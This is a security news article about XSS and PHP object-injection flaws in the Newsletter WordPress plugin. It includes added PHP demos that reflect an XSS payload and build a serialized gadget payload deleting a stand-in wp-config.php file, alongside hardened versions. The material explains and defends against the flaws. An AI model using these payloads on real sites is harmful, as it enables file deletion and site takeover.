Newsletter WordPress Plugin Opens Door to Site Takeover


An XSS bug and a PHP object-injection vulnerability are present in a plugin used by hundreds of thousands of websites.


Newsletter, a WordPress plugin with more than 300,000 installations, has a pair of vulnerabilities that could lead to code execution and even site takeover.

The Newsletter plugin offers site admins a visual editor that can be used to create newsletters and email campaigns from within WordPress. According to Wordfence, the issues are a reflected cross-site scripting (XSS) vulnerability and a PHP object-injection vulnerability, both of which are fixed by updating to the latest version of Newsletter, v6.8.2.

The first bug is an authenticated reflected XSS problem (CVE pending), a medium-severity issue rated 6.5 on the CVSS scale. Successful exploitation allows an attacker to inject JavaScript that runs in the browser of a logged-in victim who is tricked into sending the crafted request.

“Despite the fact that [this type of bug] requires an attacker to trick a victim into performing a specific action (such as clicking a specially crafted link), they can still be used to inject backdoors or add malicious administrative users,” according to Wordfence. “If an attacker tricked a victim into sending a request containing a malicious JavaScript using either of these methods, the malicious JavaScript would be decoded and executed in the victim’s browser.”

According to the Wordfence analysis released Monday, the issue arises because vulnerable versions of Newsletter use an AJAX function, tnpc_render_callback, to display edited blocks based on a set of options sent in the AJAX request. These options, however, are not filtered: they are passed directly to a second function, restore_options_from_request, and the blocks are then displayed using the render_block function.

“As such, it was possible for an attacker to get malicious JavaScript to display in multiple ways,” researchers explained in the post.

For instance, one method of exploitation would be to send a POST request to wp-admin/admin-ajax.php with the action parameter set to tnpc_render, the b parameter set to html and the options parameter set to arbitrary JavaScript, according to Wordfence. Alternatively, the options parameter could be set to an empty array (options[]=) and the encoded_options parameter set to a base64-encoded JSON string containing arbitrary JavaScript. In both cases, the JavaScript is rendered in the browser of the logged-in user who sent the request.
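
As an added illustration, not code from the Newsletter plugin or from Wordfence's write-up, the PHP below models the two request shapes just described against a stripped-down render callback, and shows what a hardened handler adds: a nonce check, a capability check and an allow-list HTML filter before output. The function names (decode_block_options, render_block_vulnerable, render_block_hardened, allow_list_html) are hypothetical, the request arrays are constructed sample input, and allow_list_html() is only a stand-in for a real allow-list filter such as WordPress's wp_kses_post().

```php
<?php
declare(strict_types=1);

// Added example: a model of an admin-ajax render callback, not the plugin's code.
// All function names below are hypothetical.

/** Pull block options out of the request the two ways the report describes:
 *  encoded_options holding base64(JSON), or a plain options[] array. */
function decode_block_options(array $request): array
{
    if (is_string($request['encoded_options'] ?? null)) {
        $json = base64_decode($request['encoded_options'], true);
        $opts = ($json === false) ? null : json_decode($json, true);
        return is_array($opts) ? $opts : [];
    }
    if (is_array($request['options'] ?? null)) {
        return $request['options'];
    }
    return [];
}

/** Vulnerable pattern: the "html" block echoes its option back unfiltered,
 *  and nothing checks who is asking. */
function render_block_vulnerable(array $request): string
{
    if (($request['b'] ?? '') !== 'html') {
        return '';
    }
    $options = decode_block_options($request);
    return '<div class="block-html">' . ($options['html'] ?? '') . '</div>';
}

/** Stand-in for an allow-list filter like wp_kses_post(): keeps a few inline
 *  tags and drops every attribute, so no onerror/onclick survives. */
function allow_list_html(string $html): string
{
    $stripped = strip_tags($html, '<p><br><b><i><strong><em>');
    return preg_replace('/<(\w+)\b[^>]*>/', '<$1>', $stripped) ?? '';
}

/** Hardened pattern: refuse requests without a valid nonce or an editing
 *  capability (both modelled as callables), then filter before output. */
function render_block_hardened(array $request, callable $nonce_is_valid, callable $user_can_edit): string
{
    if (!$nonce_is_valid($request['_wpnonce'] ?? '') || !$user_can_edit()) {
        return ''; // a real handler would wp_die(-1) or wp_send_json_error()
    }
    if (($request['b'] ?? '') !== 'html') {
        return '';
    }
    $options = decode_block_options($request);
    return '<div class="block-html">' . allow_list_html((string) ($options['html'] ?? '')) . '</div>';
}

// --- Demo with the two request shapes from the write-up (constructed input) ---
$payload = '<img src=x onerror="alert(document.cookie)">';

$viaOptions = ['action' => 'tnpc_render', 'b' => 'html', 'options' => ['html' => $payload]];
$viaEncoded = ['action' => 'tnpc_render', 'b' => 'html', 'options' => [],
               'encoded_options' => base64_encode(json_encode(['html' => $payload]))];

foreach ([$viaOptions, $viaEncoded] as $req) {
    echo "vulnerable: ", render_block_vulnerable($req), PHP_EOL;   // payload reflected verbatim
    echo "hardened  : ", render_block_hardened(
        $req + ['_wpnonce' => 'demo'],
        fn(string $n): bool => hash_equals('demo', $n),           // stands in for check_ajax_referer()
        fn(): bool => true                                         // stands in for current_user_can('edit_posts')
    ), PHP_EOL;                                                   // <img ...> removed entirely
}
```

In a real WordPress handler the two callables are check_ajax_referer() and current_user_can(), and the filter is wp_kses_post(); strip_tags() plus a regex is shown here only so the script runs without WordPress and is not a substitute for a real sanitizer.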

The second bug (the CVE is also pending on this one) is a high-severity PHP object-injection bug, rated 7.5 on the CVSS scale. The vulnerability could be used to inject a PHP object that in turn could be processed by code from another plugin or theme, and used to execute arbitrary code, upload files or "any number of other tactics that could lead to site takeover," the firm warned.

“Although the Newsletter editor did not allow lower-level users to save changes to a given newsletter, the same tnpc_render_callback AJAX function was still accessible to all logged-in users, including subscribers,” according to Wordfence. “This introduced a PHP object-injection vulnerability via the restore_options_from_request function.”

In terms of exploitation, Wordfence researchers explained that __destruct, the PHP magic method that runs when an object is destroyed, is used by many plugins and themes to automatically delete files and "clean up" once a predefined, legitimate process is completed. An example would be a script on an e-commerce site that calculates product prices, stores a log of that action, and then deletes the log when it's done.

If such code were running on a site that also contained the PHP object-injection vulnerability, an attacker could delete the wp-config.php file containing the WordPress site's core configuration settings. The specially crafted payload deserializes into an object of that cleanup class with its file-path property pointed at wp-config.php; when PHP destroys the injected object, the destructor's cleanup routine deletes the file.

“The deletion of the wp-config.php file would reset the site and allow an attacker to take over by pointing the site’s new configuration to a remote database under their control,” explained Wordfence.
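
As an added example, not code from Newsletter, Wordfence or any real plugin, the PHP below models the chain described above end to end: an options decoder that reaches unserialize() on request data, a "log cleanup" class whose __destruct() deletes a file, and the hand-built serialized payload that turns one into a file-deletion primitive against the other. The class and function names (PriceCalcLog, decode_options_vulnerable, decode_options_hardened, build_payload) are hypothetical, and a scratch temp file stands in for wp-config.php.

```php
<?php
declare(strict_types=1);

// Added example: models the gadget chain described in the article. All names
// are hypothetical; nothing here is the plugin's or Wordfence's code.

/** Hypothetical cleanup class of the kind the article describes: it records a
 *  price calculation and deletes its log when the object goes away. */
final class PriceCalcLog
{
    public $logPath;

    public function __construct(string $logPath)
    {
        $this->logPath = $logPath;
    }

    public function __destruct()
    {
        // Legitimate use: remove the temporary log. Under object injection the
        // attacker chooses $logPath, e.g. the site's wp-config.php.
        if (is_string($this->logPath) && is_file($this->logPath)) {
            @unlink($this->logPath);
        }
    }
}

/** Vulnerable decoder: accepts base64(JSON) but falls back to unserialize(),
 *  so a serialized object in encoded_options is instantiated server-side. */
function decode_options_vulnerable(string $encoded)
{
    $raw = base64_decode($encoded, true);
    if ($raw === false) {
        return [];
    }
    $json = json_decode($raw, true);
    if (is_array($json)) {
        return $json;
    }
    return unserialize($raw);          // PHP object injection sink
}

/** Hardened decoder: JSON only, never unserialize() on request data. */
function decode_options_hardened(string $encoded): array
{
    $raw = base64_decode($encoded, true);
    if ($raw === false) {
        return [];
    }
    $json = json_decode($raw, true);
    return is_array($json) ? $json : [];
}

/** Craft the attacker's encoded_options value by hand. serialize(new PriceCalcLog(...))
 *  is deliberately avoided: that temporary object's own __destruct() would
 *  delete the target on the attacker's side. */
function build_payload(string $target): string
{
    $serialized = sprintf(
        'O:%d:"%s":1:{s:%d:"%s";s:%d:"%s";}',
        strlen('PriceCalcLog'), 'PriceCalcLog',
        strlen('logPath'), 'logPath',
        strlen($target), $target
    );
    return base64_encode($serialized);
}

// --- Demo on a scratch file standing in for wp-config.php (constructed) ---
$target = tempnam(sys_get_temp_dir(), 'wpcfg');
file_put_contents($target, "<?php /* pretend wp-config.php */\n");
$payload = build_payload($target);

decode_options_hardened($payload);                  // returns [], no object instantiated
clearstatcache();
printf("after hardened decode:   %s\n", file_exists($target) ? 'file intact' : 'file gone');

$obj = decode_options_vulnerable($payload);         // PriceCalcLog instance created
unset($obj);                                        // __destruct() runs -> unlink()
clearstatcache();
printf("after vulnerable decode: %s\n", file_exists($target) ? 'file intact' : 'file gone');
```

If serialized input genuinely must be read, PHP 7.0 and later accept unserialize($raw, ['allowed_classes' => false]), which turns any object in the data into __PHP_Incomplete_Class so no destructor or other magic method runs; a JSON-only decoder as above removes the sink entirely.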

The researchers added that to succeed, an attacker would need to know which plugins are installed on a given site. That can be uncovered with scanning tools, but it makes the bug unlikely to be exploited by an automated script or in bulk.

WordPress Plugin Bugs Proliferate

WordPress plugins are no strangers to security vulnerabilities, some of which can be critical. For instance, last week just such a bug was found in a WordPress plugin called Comments – wpDiscuz, which is installed on more than 70,000 websites. The flaw gives unauthenticated attackers the ability to upload arbitrary files (including PHP files) and ultimately execute remote code on vulnerable website servers.

Earlier in July, it was discovered that the Adning Advertising plugin for WordPress, a premium plugin with over 8,000 customers, contains a critical remote code-execution vulnerability with the potential to be exploited by unauthenticated attackers.

In May, Page Builder by SiteOrigin, a WordPress plugin with a million active installs that’s used to build websites via a drag-and-drop function, was found to harbor two flaws that could allow full site takeover.

Meanwhile in April, it was revealed that legions of website visitors could be infected with drive-by malware, among other issues, thanks to a CSRF bug in Real-Time Find and Replace.
